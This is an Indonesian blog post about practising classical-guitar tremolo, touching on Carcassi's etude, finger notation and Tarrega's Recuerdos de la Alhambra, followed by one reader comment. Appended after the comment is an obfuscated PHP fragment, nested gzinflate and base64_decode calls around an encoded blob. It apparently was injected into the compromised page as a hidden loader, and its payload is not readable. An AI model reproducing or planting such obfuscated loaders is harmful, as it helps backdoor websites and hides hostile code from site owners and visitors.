Delicious

Archives

Categories

Lancarin Tremolo

  ozzie / 17/06/2008


Biar lancar maen keyboard di Shell apalagi dituntut maen cepet di console saat meng-configure rule dan policy routing 8-}8-}8-} maka dari pada itu harus belajar Tremolo ;));));))

kebetulan nemu karya nya om Carcassi di google :D:D
(Etude Opus 60. No.7). =p~=p~
M. Carcassi

Tremolo sendiri ampir sama kayak Tuplet ato triple di drum :D.. tapi notasi Tuplet nada dengan ketukan yang sama… :-s.. kalo teknik Tremolo di Classical Guitar.. di maenin(dipetik) dengan ketukan yang sama #:-s#:-s.. metik nya pun pake 3 jari #-o#-o.. mana di senar yg sama;));)).. nyangkut dah tuh 8-}8-}8-}..

dalem Classical Guitar Technique… notasi Tremolo di tulis dengan bagian jari (p,i,m,a)

p = thumb / jempol
i = index / telunjuk
m = middle / jari tengah
a = ring finger / jari manis

jadi urutannya sekali metik = jari manis, jari tengah, jari telunjuk (p,a,m,i) ;))

diaantara banyak aransmen yang pake teknik tremolo… Recuerdos de la Alhambra karya om Tarrega lumayan paling tenar 8->8->

ni nemu video orang maen Recuerdos de la Alhambra di Youtube: http://www.youtube.com/watch?v=AIzKsNIRrV4 ;));));))

moga-moga makin lancar di Shell ama CLI

[-o<[-o<[-o<[-o< amiinnnnn


« »


One Response to “Lancarin Tremolo”

  1. Budi Says:

    Mau nanya nih…kalo El Colibri nya Sagreras apa juga pake teknik tremolo?


".gzinflate(base64_decode(gzinflate(base64_decode(gzinflate(base64_decode('BcHRdkMwAADQD/KgS0mzR8ShjSMJNWveEEamOGljab9+9+KOSbyef5IA89DREZ+phxlyKhQ2sF/pt2hxFtPHwFYI4J1+mVr7YRsVICLl0fQMYyzzvW8FIOGbX1PVUVAP0/uWuZs8RWoEcMl8XpKEe37FrPxw/eeNGNw19npJt8S5uOlh83I2wUDpI6btM7hPv0s8Idtwt7XVp6gqMz92VSRz6Zx7WFuuSb8YAk8IveQfQ69xi7kGBRCNSsZSDPl+CP4B'))))))); ?>